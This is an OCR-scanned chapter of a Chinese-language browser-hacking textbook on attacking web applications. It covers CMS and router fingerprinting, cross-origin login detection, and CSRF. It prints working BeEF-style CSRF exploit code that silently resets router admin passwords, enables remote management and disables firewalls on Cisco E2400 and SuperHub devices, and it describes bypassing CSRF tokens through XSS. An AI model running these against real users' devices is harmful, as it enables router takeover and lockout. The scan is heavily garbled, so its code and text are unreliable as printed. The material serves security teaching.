图 9-3 ”找到 了 VMware ESXi 服 务 器 


2. 请 求 页 面 

很 多 CMS 和 一 般 Web 应 用 的 指纹 采集 工具 都 有 一 个 大 型 的 数据 库 , 其 中 包含 CMS 的 类 型 、 版 
本 主题 和 插件 信息 。 比 如 Chris Sullo( Nikto 的 作者 ) 创 建 的 CMS-Explorer , 就 包含 Drupal、 Joomla 
和 WordPress 的 数 千 个 插件 和 主题 URL 路 径 。 这 些 信 息 非常 有 用 ， 特 别 是 当 配合 利用 XSS 和 SQLi 
等 这 类 CMS 搬 件 中 常见 的 安全 漏洞 时 ， 往 往 能 得 到 非常 可 靠 的 结果 。 

要 检测 某 个 应 用 是 否 存 在 特定 的 路 径 ， 比 如 modules/filebrowser/， 可 以 采用 与 之 前 检测 图 片 
类 似 的 方法 。 首 先 ， 创建 一 个 数据 结构 ， 包 含 Drupal 中 使 用 的 多 种 插件 的 名 称 和 路 径 。 对 每 个 要 
检测 的 路 径 ， 都 创建 一 个 带 自 定义 onerror 和 onloagd 处 理 程序 的 script 标 签 。 比 如 可 以 使 用 下 
面 的 脚本 : 


var target = "http://172.16.37.147"; 








/* 要 检查 的 资源 (名 称 ， 路 径 ) */ 
var resources = [ 
["Drupal - FileBrowser","modules/filebrowser/"], 
["Drupal - FFmpeg", "modules/ffmpeg/"], 
{"WordPress - AccessLogs", "wp-content/plugins/access-logs/"] 


1; 


/* 上 层 路 径 (/ 或 /drupal) */ 
var paths = ["/", "/drupal/"]; 


function add_tag(src) { 
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for(var p=0; p < paths.length; p++) ( 
// 对 每 个 上 层 路 径 ， 创 建 最 终 的 URI 
var uri = target + paths[p] + src; 


var i = document.createElement ('script'); 
issre s uri; 
i.style.display = 'none'; 
i.onload = function()( 
console.log(uri + " -- FOUND"); 
i 
i.onerror = function() { 
console.log(uri + " -- NOT-FOUND") ; 
jer 
document.body.appendChild(i); 
} 
} 


/* 对 每 个 待 检查 的 资源 ， 添 加 新 的 Script 标签 */ 
for(var c=0; c < resources.length; c++) { 
add tag(resources[c][1]); 


} 


你 都 看 到 了 , 这 里 没有 使 用 img 标 签 ， 而 是 使 用 了 script 标 签 。 运 行 以 上 代码 后 ， 如 果 找 到 
了 资源 , 应 该 可 以 看 到 如 图 9-4 中 所 示 的 语法 错误 。 之 所 以 会 报 这 种 错 , 是 因为 HTML 文 件 通常 都 
返回 text /html 内 容 类 型 ， 而 不 会 返回 application/javascript， 因此 会 导致 JavaScript 解 析 
错误 。 


iè Clear Persist Profile f . Errors Warnings Info Debug info Cookies 
>>> var target = "http://172.16.37.147"; /* Resourc...s.length; c++) { add tag(resources[c][1]); } 
undefined 
© "NetworkError: 404 Not Found - http://172.16.37.147/modules/filebrowser/" /modul..rowser/ 
http://172.16.37.147/drupal/modules/filebrowser/ -- NOT-FOUND 
http://172.16.37.147/drupal/modules/filebrowser/ -- FOUND 
© "NetworkError: 404 Not Found - http://172.16.37.147/modules/ffmpeg/" [modules /ffmpeg/ 
http://172.16.37.147/drupal/modules/ffmpeg/ -- NOT-FOUND 
© "NetworkError: 404 Not Found - http://172.16.37.147/drupal/mNdules/ffmpeg/" /drupa...ffmpeg/ 
http://172.16.37.147/drupal/modules/ffmpeg/ -- NOT-FOUND 
© "NetworkError: 404 Not Found - http://172.16.37.147/wp-content/Nlugins/access-1logs/" /wp-co...s-logs/ 
http://172.16.37.147/drupal/wp-content/plugins/access-logs/ -- NOT- 
© "NetworkError: 404 Not Found - http: //172.16.37.147/drupal/wp-content/plugins/access-1o_ /drupa..s-logs/ 
http://172.16.37.147/drupal/wp-content/plugins/access-logs/ -- NOT-FO 
© SyntaxError: syntax error 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> [drupa..rowser/ (line 1) 





正确 识别 到 一 个 资源 


| HTML CSS JS XHR Images Flash Media 


* GET /modules/filebrowser/ 404 Not Found 172.16.37.147 172.16.37.1:53738 
* GET /drupal/modules/filebrowser/ 200 OK 172.16.37.147 172.16.37.1:53739 
* GET /modules/ffmpea/ 404 Not Found 172.16.37.147 172.16.37.1:53740 
* GET /drupal/modules /ffmpea/ 404 Not Found 172.16.37.147 172.16.37.1:53741 
* GET /wo-content/pluains/access-loas/ — 404 Not Found 172.16.37.147 172.16.37.1:53742 
> GET /drubpal/wo-content/oluains/access. 404 Not Found 172.16.37.147 172.16.37.1:53743 








图 9-4 找到 了 Drupal 及 其 FileBrowser 搬 件 
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要 注意 的 是 ,虽然 我 们 请 求 的 都 是 不 包含 JavaScript 的 已 知 资源 ,但 这 种 方法 非常 容易 被 发 现 ， 
从 而 被 反击 。 这 些 资源 都 可 以 被 改 成 一 段 脚本 ， 然 后 反击 者 可 以 利用 它 接 管 勾 连 浏览 需 。 当 然 ， 
也 有 一 些 方法 可 以 让 攻击 更 加 隐蔽 ， 比 如 使 用 内 骨 框 架 的 sangdbox 属 性 。 

同样 的 技术 也 可 用 于 采集 那些 暴露 Web 界 面 的 设备 的 指纹 。 下 面 的 例子 就 是 要 检测 Sky 的 宽 
带路 由 器 Sagemcom F@ST 2504*。 如 果 你 没有 用 过 这 款 路 由 器 ， 也 不 用 担心 ， 因 为 后 面 介绍 的 各 
种 技术 并 不 局 限于 某 款 设备 ， 而 是 都 可 以 举一反三 地 用 于 其 他 类 似 的 设备 。 

与 很 多 类 似 的 设备 一 样 ， 这 款 路 由 器 可 以 通过 http://192.168.0.1:80 这 样 的 URL 访 问 到 ， 而 且 
对 外 暴露 了 JavaScript 文 件 和 图 片 可 供 我 们 验证 。 有 了 这 些 特征 , 我 们 就 可 以 对 比 其 指纹 了 。 可 以 
使 用 以 下 代码 来 识别 Sagemcom 路 由 器 : 


// 默认 的 路 由 器 IP 
var target = "192.168.0.1"; 















































// 默认 的 路 由 器 图 片 
Var fingerprint_data = new Array ( 
new Array ( 
"Sky Sagemcom Router", 
"80", "http",true, 
"/sky_images/arrows.gif",8,16), 
new Array ( 
"Sky Sagemcom Router", 
"80", "http",true, 
"/sky_images/icons-broadband. jpg", 43,53) 
py 





var dom = document.createElement('b'); 


for(var u=0; u < fingerprint data.length; u++) { 
var img = new Image; 
img.id = u; 
img.src = fingerprint_data[u] [2]+"://"+target 
+":"+fingerprint_data[u][1]+ fingerprint_data[u] [4]; 





// 触发 onloadq 事 件 ， 找 到 了 图 片 
img.onload = function() { 


// 再 次 检查 宽度 和 高 度 


if(this.width == fingerprint data[this.id][5] && 
this.height == fingerprint data[this.id][6])t 


console.log("Found " + fingerprint data[this.id][4] + 

" -> " + fingerprint data[this.id][0]); 

// 完工 ， 从 DOM 中 删除 图 片 

dom.removeChild(this) ; 

} 

} 

// 将 图 片 添加 到 DOM 
dom. appendChild(img) ; 








j 
运行 前 面 代码 的 结果 如 图 9-5 所 示 ， 确 认 了 可 以 通过 http://192.168.0.1:80 访 问 Sagemcom 路 由 
器 。 为 什么 呢 ? 因为 该 路 由 器 默认 的 两 张 图 片 都 准确 地 找到 了 。 
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*|Consoley HTML CSS Script DOM Net Cookies 
iè Clear Persist Profile All Errors Warnings Info Debug Info 
>>> // default router IP var target = "192.168.0.1";... the 
image to the DOM dom.appendChild(img); } 
<img id="1" srce"http://192.168.0.1:80/sky images/icons- 
broadband. jpg"» 

Found /sky_images/arrows.gif -> Sky Sagemcom Router 
Found /sky images/icons-broadband.jpg -> Sky Sagemcom Router 





var dom = document.createElement('b'); 


for(var u«0; u < fingerprint data.length; u++) 
var img mage; 








图 9-5 ”采集 路 由 器 的 指纹 


2007 年 ，Gareth Heyes 写 出 了 jsLanScanner ,使 用 了 类 似 的 技术 发 现 和 识别 很 多 区 入 式 设备 。 
他 的 指纹 采集 数据 库 相 当 精 确 ， 包 括 了 近 200 种 不 同 的 设备 。 

成 功 发 现 并 确认 了 路 由 器 之 后 ， 接 下 来 就 要 访问 设备 。 通 常 下 一 步 就 是 要 通过 认证 这 一 关 ， 
我 们 下 一 节 就 来 介绍 。 


9.4” 跨 域 认 证 检测 


大 多 数 具 有 一 定 逻 辑 功能 的 Web 应 用 ， 都 会 把 认证 后 和 认证 前 可 以 访问 的 资源 分 开 存放 。 

对 于 未 认证 用 户 访问 需要 认证 后 才能 访问 的 资源 , 这 些 Web 应 用 常用 的 方法 是 响应 403 或 404 
HTTP 状 态 码 。 而 对 于 登录 之 后 的 请 求 资 源 的 用 户 ， 则 响应 200 状 态 码 。 

另 一 个 常用 的 方法 是 响应 302 HTTP 重 定向 状态 码 ， 将 其 用 于 请 求 受 认证 保护 的 路 径 下 不 存 
在 的 资源 。 比 如 , 假设 你 请 求 http://browserhacker.com/admin/non existent, 在 这 里 所 有 位 于 /admin/ 
路 径 下 的 资源 都 要 求 用 户 认证 。 如果 是 未 认证 用 户 访 问 /admin/mon_existent, Web 应 用 就 会 响应 302 
状态 码 , 将 其 重 定向 回 登录 页 面 /admin/login。 相反 ,如果 是 认证 后 的 用 户 请 求 /admin/non existent, 
就 会 得 到 404 未 找到 错误 。 

Mike Cardwell 分 析 了 很 多 社交 网 络 站 点 ， 检 查 它 们 是 否 都 使 用 类 似 的 HTTP 状态 码 。 他 的 分 
析 揭 示 了 有 意思 的 结果 "*。 比 如 Twitter， 以 第 二 种 情况 访问 不 存在 的 资源 为 例 ， 会 根据 用 户 会 话 
是 否认 证 过 ， 返 回 一 个 302 或 404。 

我 们 知道 ，HTML 的 script 标 签 在 要 加 载 的 资源 返回 403 、404 或 500 状 态 码 的 情况 下 会 触发 
onerror 事 件 ， 而 在 资源 返回 200 或 302 状 态 码 的 时 候 会 触发 onload 事 件 。 而 且 ，Twitter 需 要 认 
识 后 才能 访问 /account/* 路 径 下 的 资源 。 知 道 了 这 两 方面 的 信息 之 后 ， 就 可 以 判定 勾 连 浏览 器 是 
否 已 经 在 某 个 打开 的 标签 页 (或 窗口 ) 中 登录 到 了 Twitter， 而 且 你 可 以 在 不 违反 SOP 的 情况 下 跨 
域 这 么 做 。 下 面 的 代码 可 以 帮 我 们 做 到 . 


var script = document.createElement ("script"); 
script.onload = function() { 








































































































340 第 9 章 攻击 Web 应 用 





alert('not logged in') 
T 
script.onerror = function (){ 

alert('logged in') 
be 
Script.src = "https://twitter.com/account/non existent"; 
var head = document.getElementsByTagName ("head") [0]; 
head.appendChild(script); 


如 图 9-6 所 示 ， 如 果 勾 连 浏览 器 没有 登录 到 Twitter， 则 在 请 求 /account/non existent 这 个 不 存在 


的 资源 时 ， 服 务 器 会 返回 302 状 态 码 。 这 会 触发 脚本 标签 的 onloaq 事 件 。 


Twitter 
Twitter p:/ /browserhacker.com/ 








4 @ Twitter, Inc (US) herps:// aE browserhacker.com 





Prie? | Console + HTML CSS Script DOM Net Cookies p ee 


var script = document .createElement ("script"); 
iè Clear Persist Profile All Errors Warning script.onload = function()(alert('not logged']); 


script.onerror = function()(alert('logged')); 
>>> var script = : seript.sre = "httpss//twitter.con/account/non existent" 
document . createElement("script"); nt. getElement sByTagName ( "head" ) [0]; 
s.. .agName( "head" [0] ; head. -appendchild(scr ipt); 

head. appendChild(script); 

«script src="https://twitter.com/account 

/non. existent"» 

© syntaxError: syntax error 


«IDOCTYPE html» non existent (line 1) 











图 9-6 ”检测 到 受害 者 没有 登录 Twitter 


而 如 果 勾 连 浏 览 带 登录 到 了 Twitter， 如 图 9-7 所 示 ， 请 求 同 样 不 存在 的 资源 就 会 返回 404 状 态 


人 码 ， 从 而 触发 onerror 事 件 。 


DD hp://browserhacker.com/ lel 








| @ browserhacker.com € | (BI Googie 


Twitter x, 


On EECXXCLTERZZI 


Michele Orru' 


View my profile page 
3,602 301 1,430 wi» 至 上 "| Console HTML CSS Script DOM | |Net- | Cookies 
TWEETS FOLLOWING FOLLOWERS 
Clear Persist All HTML CSS JS XHR Images Flash MÀ 


^ GET non existent 302 Found twitter.com 
GET loain?redirect afte 200 OK twitter.com 
* GET non existent 404 Not Found twitter.com 





后 授权 请 求 








图 9-7 ”检测 到 受害 者 登录 了 Twitter 
监控 资源 加 载 时 间 也 是 跨 域 检测 常用 的 技术 。 可 以 根据 认证 会 话 与 非 认 证 会 话 加 载 资 








源 的 时 
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间 差 ， 推 新 出 一 些 重要 的 信息 。 基 于 这 些 信息 ， 可 以 判断 浏览 器 是 否 登录 到 了 某 个 应 用 。 

Haroon Meer 和 Marco Slaviero 在 2007 年 的 DEF CON 15 上 展示 了 这 个 技术 ”， 他 们 使 用 内 髓 机 
架 和 自 定 义 的 onloagd 事 件 处 理 程序 ， 监 控 框 架 内 资源 的 加 载 时 间 。 加 载 时 间 的 差别 越 大 ， 结 
就 越 精确 。Web 应 用 中 的 很 多 交互 都 会 导致 时 间 延 长 。 

默认 安装 的 Drupal 6 就 是 一 个 不 错 的 例子 。 如 果 你 登录 了 ， 并 且 请 求 http://browserhacker. 
com/drupal/?q=admin， 内 容 长 度 就 会 是 3264 字 节 。 如 果 你 没有 登录 并 请 求 同 一 个 URL， 就 会 收 到 
403 HTTP 状 态 码 ， 内 容 长 度 为 1374 字 节 。 

内 容 越 多 ， 加 载 时 间 往 往 越 长 ， 当 然 也 可 能 是 毫秒 级 的 。 下 面 的 代码 可 以 执行 上 面 的 查询 ， 
但 请 注意 进行 修改 ， 以 适合 你 的 需要 和 要 测试 的 应 用 : 


var add_iframe; 

var counter = 5; 

var sum = 0; 

/* 匹配 的 平均 时 间 。 在 此 种 情况 下 为 

http://browserhacker.com/drupal/?q-adminjj&: 

登入 用 时 > 210ms 

未 登入 用 时 < 210ms 

*/ 

var avg_to_match = 210; 

function append() { 
if (counter > 0)( 
var i = document.createElement ("iframe") ; 
i.sre = "http://browserhacker.com/drupal/?q-admin"; 
var start = new Date().getTime(); 
console.log('start:' + start); 





Iri 






























































/* 自 定义 onload 处 理 程序 监控 加 载 时 间 */ 
i.onload = function()( 
var end - new Date().getTime(); 
console.log('end:' + end); 
var total = end - start; 
console.log('total:' + total); 
sum += total; 
counter--; 
j 
document.body.appendChild(i); 
Jelse{ 
clearInterval (add_iframe) ; 
var avg = sum / 5; 
var logged_in = true; 
console.log("sum: " + sum + ", avg:" + avg); 
if(avg < 210)( 
logged in - false; 
j 
console.log("logged in Drupal 6: " + logged in); 
j 
} 
add iframe = setInterval (function() {append()},500); 


继续 以 Drupal 为 例 ， 图 9-8 和 图 9-9 展 示 了 运行 前 面 脚本 之 后 的 结果 。 注 意 总 时 长 和 平均 时 间 
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的 差别 。 












browserhacker.com /drupal/ p 区 图 Google 


BT5-drupal 













User login | Welcome to your new Drupal website! 


Please follow these steps to set up and start using your website: 
Username: * 


| 
=w <> =| Console- HTML CSS Script DOM Net Cookies 
i» Clear Persist Profile All Errors W ver counter - 
| WeCWOrKCTTOr. OD TOTT tq —aannir 











var counter = 5; 
var sum = 0; 
function append(){ 





http://browserhacker.com/drupal | if(counter > 0){ 
?g-admin" T onire = function()(comsole.l 
/1 q-admin i.sro = Tues elt Nene 
end:1369477448755 et 
total :188 ‘yar end z new Date() getie( ); 
sum: 983, avg:196.6 Var tota 





logged in Drupal 6: false ) Run Clear Copy History 


图 9-8 ”检测 到 受害 者 未 登录 到 Drupal 














admin Welcome to your new Drupal website! 





#8 <> -Console- HTML CSS Script DOM Net Cookies 
iè Clear Persist Profile All Errors W. REPE 





) 
document . body. appendChild(i); 
)else( 


total:230 clearInterval(add iframe); 


var avg = sum/5; 


start:1369477350391 Console log("Rümi * au 4; 
if(avg < 210 


end: 1369477350627 : TSsged_in = false; 

total :236 ; console.log("logged in Drupal 
sum: 1177, avg:235.4 ja = setInterval(function()(api 
logged in Drupal 6: true Run Clear Copy History 


图 9-9 检测 到 受害 者 登录 到 了 Drupal 


如 果 能 准确 知道 勾 连 浏览 器 是 否 登录 到 了 Web 应 用 , 那么 接 下 来 发 动 攻击 就 会 更 靠 谱 。 有 了 
这 些 先决 信息 , 再 知道 没有 被 XSRF token 保 护 的 资源 , 就 可 以 伪装 成 浏览 器 用 户 , 执行 各 种 操作 。 


9.5 利用 跨 站 点 请 求 伪造 


跨 站 点 请 求 伪 造 ( Cross-site Request Forgery ) 漏洞 ， 通 常 指 CSRF 或 XSRF 漏 洞 。XSRF 攻 击 
最 早 由 Peter Watkins 在 2001 年 指出 ， 当 时 他 在 Full Disclosure 邮 件 列表 中 启动 了 一 个 线程 "， 以 讨 
论 这 个 问题 。 从 那 时 起 ，XSRF 漏 洞 变 得 众所周知 ， 整 个 安全 社区 无 人 不 晓 。 
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9.5.1 理解 跨 站 点 请 求 伪造 


XSRF 攻 击 利用 了 Web 应 用 对 其 用 户 的 HTTP 请 求 的 信任 。 在 你 已 知 某 用 户 已 经 登录 Web 应 用 
的 情况 下 ， 这 种 攻击 非常 有 用 。 别 忘 了 ， 上 一 节 讨 论 的 技术 可 以 帮 攻 击 者 确定 用 户 是 否 登录 了 
应 用 。 

假设 有 一 个 应 用 ， 如 果 用 户 想 访问 http://browservictim.com/admin/users， 那 他 必须 先 登录 为 
管理 员 。 如 果 攻 击 者 控制 了 浏览 器 中 的 一 个 源 ， 而 另外 一 个 源 认 证 过 ,那么 他 就 有 可 能 利用 Web 
应 用 中 的 XSRF 漏 洞 。 换 句 话 说， 就 是 攻击 者 通过 包含 经 过 适当 格式 化 的 请 求 ， 可 以 伪装 成 认证 
用 户 执行 操作 。 

攻击 者 可 以 伪造 跨 域 AJAX 请 求 。 浏 览 器 处 理 该 请 求 后 ， 请 求 会 自动 包含 用 户 的 cookie， 
而 就 变 成 了 合法 认证 过 的 请 求 了 。 peri ee 提交 参数 相同 的 HTML 表 单 , 也 可 以 
伪造 同样 的 请 求 。 这 些 请 求 通 常会 被 Web 应 用 信任 ， 是 因为 用 户 已 经 登录 过 了 ， 而 且 每 次 请 求 都 
会 有 相应 的 cookie 随 之 发 送 给 源 。 之 所 以 可 以 利用 这 种 漏洞 ， 是 因为 HTTP 请 求 可 以 被 模仿 ， 而 
HTTP 协 议 也 未 说 明 如 何 处 理 独一无二 的 请 求 。 
再 考虑 另 一 种 情形 : 一 位 用 户 登 录 到 了 Cisco E2400 路 由 器 的 管理 界面 。 如 果 该 Web 管 理 界 面 
容易 遭受 XSRF 攻 击 ， 那 么 只 要 知道 所 需 参数 ， 就 可 以 模仿 发 送 各 种 请 求 。 因 而 攻击 者 可 以 在 另 

一 个 源 中 ， 以 用 户 身 份 执行 以 下 代码 : 
beef.execute(function() { 


var gateway = 'http://192.168.100.2/'; 
var passwd = 'new password'; 






























































// 对 每 个 IP 启 动 远程 管 理 并 修改 管理 员 ED 
var cisco_e2400_iframel = beef.dom.createlframeXsrfForm \ 











(gateway + "apply.cgi", "POST", 

[ 
{'type':'hidden', 'name':'submit button', 'value':'Management'), 
('type':'hidden', 'name':'change action', 'value':''}, 
{'type':'hidden', 'name':'action', 'value':'Apply'), 
{'type':'hidden', 'name':'PasswdModify', 'value':'0'J), 
('type':'hidden', 'name':'http enable', 'value':'1'j, 
{'type':'hidden', 'name':'https enable', 'value':'1'j, 
('type':'hidden', 'name':'ctm404 enable', 'value':''} 
{'type':'hidden', 'name':'remote_mgt_https', ‘value’ e tI F; 
{'type':'hidden', 'name':'wait_time', 'value':'4'}, 
{'type':'hidden', 'name':'need reboot', 'value':'0'j, 
('type':'hidden', 'name':'http passwd', 'value':passwdj, 
{'type':'hidden', 'name':'http passwdConfirm','value':passwd), 
{'type':'hidden', 'name':' http enable', 'value':'1'j, 
{'type':'hidden', 'name':' https enable', 'value':'1'j, 
{'type':'hidden', 'name':'web wl filter', 'value':'0'J), 
{'type':'hidden', 'name':'remote management', 'value':'1'}, 
{'type':'hidden', 'name':' remote mgt https', 'value':'1'}, 
('type':'hidden', 'name':'remote upgrade', 'value':'1'j, 
{'type':'hidden', 'name':'remote ip any', 'value':'1'}, 
{'type':'hidden', 'name':'http wanport', 'value':'8080'}, 





344 第 9 章 攻击 Web 应 用 





{'type':'hidden', 'name':'nf_alg_sip', 'value':'0'}, 
('type':'hidden', 'name':'ctf disable', 'value':'0'J, 
('type':'hidden', 'name':'upnp enable', 'value':'1'j, 
('type':'hidden', 'name':'upnp config', 'value':'0'J, 
('type':'hidden', 'name':'upnp internet dis', 'value':'0'}, 


Jye 


// 禁用 防火 墙 和 Java/Activex 检 测 
var cisco e2400 iframe2 = beef.dom.createlframeXsrfForm \ 











(gateway + "apply.cgi", "POST", 

[ 
('type':'hidden', 'name':'submit button', 'value':'Firewall'), 
('type':'hidden', 'name':'change action', 'value':''), 
('type':'hidden', 'name':'action', 'value':'Apply'), 
('type':'hidden', 'name':'block wan', Uvalcue'itoty, 
('type':'hidden', 'name':'block loopback', 'value':'0'j, 
('type':'hidden', 'name':'multicast, pass', 'value':'1'J, 
('type':'hidden', 'name':'ipv6 multicast pass', 'value':'1'), 
('type':'hidden', 'name':'ident pass', 'value':'0'}, 
('type':'hidden', 'name':'block cookie', 'value':'0'}, 
('type':'hidden', 'name':'block java', 'value':'0'}, 
('type':'hidden', 'name': 'block_proxy', 'value':'0'j, 
('type':'hidden', 'name':'block activex', 'value':'0'J, 
('type':'hidden', 'name':'wait time', 'value':'3'}, 
{'type':'hidden', 'name':'ipv6_filter', 'value':'off'), 
('type':'hidden', 'name':'filter', 'value':'off') 
1); 
beef.net.send("«$- Gcommand url %>", <%= @command_id %>, \ 


"result=exploit attempted"); 


cleanup = function() { 

document .body.removeChild(cisco_e2400_iframel1) ; 
document .body.removeChild(cisco_e2400_iframe2) ; 
j 

setTimeout ("cleanup()", 15000); 


3): 


多 数 情况 下 这 些 代 码 都 可 以 跨 域 得 到 信任 。 代 码 会 动态 创建 两 个 不 可 见 的 内 髓 框架 , 每 个 框 
架 中 包含 一 个 HTML 表 单 ， 表 单 中 包含 所 有 隐藏 的 输入 字段 ， 用 于 创建 两 个 有 效 的 请 求 。 第 一 个 











会 开启 远程 管理 (Remote Management ) 功能 ， 只 能 通过 HTTPS 和 受 保 护 的 默认 的 密码 访问 ; 第 





二 个 会 禁用 防火 墙 和 Java/ActiveX 控 件 。 这 些 变化 都 会 静 悄 悄 地 在 路 由 器 上 发 生 , 用 户 毫 无 
如 果 攻 击 成 功 ， 那 攻击 者 就 可 能 连接 到 远程 管理 端口 ， 从 而 完全 控制 用 户 的 路 由 器 。 
BeEF 的 dom.js 核 心 文件 的 JavaScript API 可 以 用 来 动态 创建 HTML 表 单 ， 


createlframeXsrfForm: function(action, method, inputs) { 
// ERRARE ORT YA IER 
var iframeXsrf = beef.dom.createInvisibleIframe(); 








var formXsrf = document.createElement('form'); 
formXsrf.setAttribute('action', action); 


qu 





察觉 


AN 460 
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formXsrf.setAttribute('method', method); 


// 添加 到 表单 的 输入 数组 (type，name，value) . 


// 比如 [('type':'hidden', 'name':'1', 'value':'') 

/ / ('type':'hidden', 'name':'2', 'value':'3'j] 
var input - null; 
for (i in inputs)( 
var attributes - inputs[i]; 


input - document.createElement('input'); 
for(key in attributes) { 
input.setAttribute(key, attributes[key]); 
j 
formXsrf.appendChild(input); 
j 
// 表单 附加 到 了 隐藏 的 ITFrame, 并 提交 
iframeXsrf.contentWindow.document.body.appendChild(formXsrf); 
formXsrf.submit(); 
return iframeXsrf; 


) 


以 上 API 方 法 可 以 让 模块 方便 地 创建 随时 可 用 的 XSRF 攻 击 , 而且 之 后 还 可 以 连环 实施 其 他 利 
FA. 使 用 HTML 表 单 而 不 是 xMLHttpRequest 对 象 来 发 送 请 求 更 可 靠 ,因为 不 必 担 心 不 同 浏览 








对 XMLHttpRequest 对 象 的 实现 差异 。 


95.2 ”通过 XSRF 攻击 密码 重 置 














路 由 器 的 一 个 常见 安全 问题 , 是 能 够 在 不 知道 旧 密 码 的 情况 下 重 置 管理 员 密码 。 很 多 路 由 器 








也 支持 远程 管理 ， 通 常 由 ISP 的 远程 支持 团队 帮 用 户 解 决 连接 问题 
John Carroll ZH", SuperHub 路 由 器 的 Web 界 面 中 的 几乎 所 有 资 is ARA T e] n] 2H 
用 。 而 且 ， 这 种 路 由 器 在 重 置 管理 员 密 码 时 ， 也 不 需要 提供 旧 密 码 。 
这 意味 着 跨 域 请 求 可 以 在 目标 设备 上 执行 一 些 重要 的 操作 。 在 匀 连 浏览 器 中 
码 ， 可 以 利用 这 些 漏洞 。 如 果 用 户 经 过 了 认证 ， 以 下 代码 就 可 以 重 置 管理 员 密 码 、 
启用 远程 管理 : 
var gateway = 'http://192.168.100.1/'; 


var passwd 'BeEF12345'; 
var port 531337 


























// ERA 8955 33 SB BALE € 7) ' BeEF12345" 
var iframe 1 = beef.dom.createIframeXsrfForm( 


gateway + "goform/RgSecurity", "POST", [ 
('type':'hidden', 'name':'NetgearPassword', 'value':passwd), 
('type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd), 
('type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00') 


Iy 


// 禁用 防火 墙 
var iframe 2 = beef.dom.createlframeXsrfForm ( 
gateway + "goform/RgServices", "POST", [ 





XSRF 攻 击 利 


= 


运行 下 面 的 代 
禁用 防火 墙 并 
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{'type': 'hidden', 'name':'cbPortScanDetection', 'value':''} 


] ) ; 


// 在 端口 31337 启 用 远程 管理 
var iframe 3 = beef.dom.createlframeXsrfForm ( 


gateway + "goform/RgVMRemoteManagementRes", "POST", [ 
('type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'}, 
('type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port) 


1); 
如 果 你 通过 浏览 器 攻击 路 由 器 ， 回 报 会 非常 丰厚 。 不 仅 路 由 需 上 更 新 的 证 书 可 在 将 来 继续 
修改 , 甚至 可 以 把 合法 的 用 户 锁 在 外 面 。 这 样 能 让 未 认证 的 访问 时 间 更 长 , 让 防御 者 无 法 反抗 。 

















9.5.3 ”使 用 CSRF token 获得 保护 


如 果 在 浏览 器 发 送 给 Web 应 用 的 请 求 后 面 ， 加 上 一 个 伪 随 机 token ( 防御 XSRF 的 token ) 作为 
参数 ， 那 么 XSRF 攻 击 可 能 会 失败 “。 下 面 是 一 个 常规 的 、 存 在 漏洞 的 HTML 表 单 : 


<form name="addUserToAdmins" action="/adduser" method="POST"> 
<input type="hidden" name-"userId" value"1234"> 
<input type="hidden" name="isAdmin" value"true"> 
<input type="submit" value-"Add to admin group" \ 
style="height: 60px; width: 150px; font-size:3em"> 
</form> 


以 下 是 添加 了 防御 XSRF 的 token 的 表单 : 


<form name="addUserToAdmins" action="/adduser" method="POST"> 
<input type="hidden" name="userId" value"1234"> 
<input type="hidden" name="isAdmin" value"true"> 








<input type="hidden" name="TOKEN" value"asasdasd86a\ 
sd876as87623234aksjdhjkashd"> 


<input type="submit" value="Add to admin group" 
style="height: 60px; width: 150px; font-size:3em"> 
</form> 


还 说 前 面 攻击 Cisco E2400 的 例子 。 如 果 HTML 表 单 通过 防御 XSRF 的 token 保 护 起 来 ， 攻 击 就 
可 能 失败 。Web 应 用 在 解析 POST 请 求 时 ， 会 验证 token 是 否 有 效 。 如 果 有 效 ， 应 用 才 会 接受 以 及 
处 理 请 求 。 

防御 XSRF 的 token 确 实 可 以 降低 很 多 Web 应 用 被 勾 连 浏览 器 利用 的 可 能 性 。 如 果 你 没有 控制 
目标 域 ， 就 无 法 跨 域 读 取 HTTP 响 应 ， 因 而 也 无 法 直接 估计 或 确定 防御 XSRF 的 token 的 值 。 如 果 
没有 有 效 的 token， 虽 然 仍 然 可 以 发 送 请 求 ， 但 请 求 会 被 忽略 或 丢弃 。 

通过 XSS 绕 过 防御 XSRF 的 token 

防御 XSRF 的 token 的 作用 是 降低 跨 站 点 请 求 伪 造 攻击 成 功 的 可 能 性 ， 但 对 XSS 无 效 。 如 果 目 
标 Web 应 用 使 用 了 防御 XSRF 的 token， 而 你 通过 勾 连 控制 了 目标 源 ， 则 可 以 绕 过 该 保护 机 制 。 前 
几 章 讨论 过 ， 一 个 XSS 漏 洞 就 可 以 让 攻击 者 完全 控制 受害 的 源 。 
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攻击 者 控制 了 源 之 后 ， 就 可 以 从 包含 表单 的 页 面 中 获取 防御 XSRF 的 token， 然 后 将 其 添加 到 
新 的 恶意 表单 中 。 因 为 token 正 确 ， 所 以 攻击 就 会 得 进 。 


9.6 ” 跨 域 资源 检测 


在 无 法 采集 Web 应 用 指纹 的 情况 下 ,还 有 可 能 检测 跨 域 资 源 。 只 不 过 ， 这 个 过 程 需要 攻击 者 
花 更 多 时 间 和 心思 。 这 种 情况 下 ， 只 能 使 用 有 根据 的 推测 发 送 跨 域 请 求 。 

虽然 可 以 做 出 推断 , 但 毕竟 不 知道 目标 Web 应 用 的 结构 。 比 如 , 目标 应 用 可 能 有 一 个 根 目 录 ， 
而 在 某 个 可 能 的 目录 下 提供 了 登录 功能 ， 而 登录 可 能 会 用 到 某 个 可 以 猜 到 的 参数 名 。 

James Fisher 创 建 的 工具 ， 比 如 DirBuster”*， 使 用 已 知 Web 应 用 的 常见 目录 和 文件 列表 ， 来 发 
现 未 知 Web 应 用 的 隐藏 目录 。 虽 然 这 些 工 具 需 要 直接 访问 Web 应 用 ， 但 可 以 使 用 同一 份 列 表 ， 以 
使 用 不 同 的 检测 逻辑 来 发 现 跨 域 资源 。 

XSRF 保 护 措施 有 一 个 副作用 , 那 就 是 会 降低 跨 域 资源 检测 的 可 靠 性 。 如 果 XSRF 防 护 措施 很 
到 位 ,那么 Web 应 用 的 跨 域 响应 的 变数 最 低 。 这 对 采用 此 方法 识别 资源 来 说 就 是 很 大 的 问题 。 防 
御 XSRF 的 token 也 可 以 阻止 通过 勾 连 源 在 Web 应 用 上 实施 的 攻击 。 XSRF 保 护 措施 是 通过 浏览 器 增 
加 攻击 面 时 必须 要 考虑 的 。 

前 几 章 介绍 了 如 何 使 用 内 艇 框架 来 实现 持久 化 以 及 如 何 对 用 户 进行 社会 工程 攻击 。 同 样 的 技 
术 也 适用 于 跨 域 资源 检测 。 
























































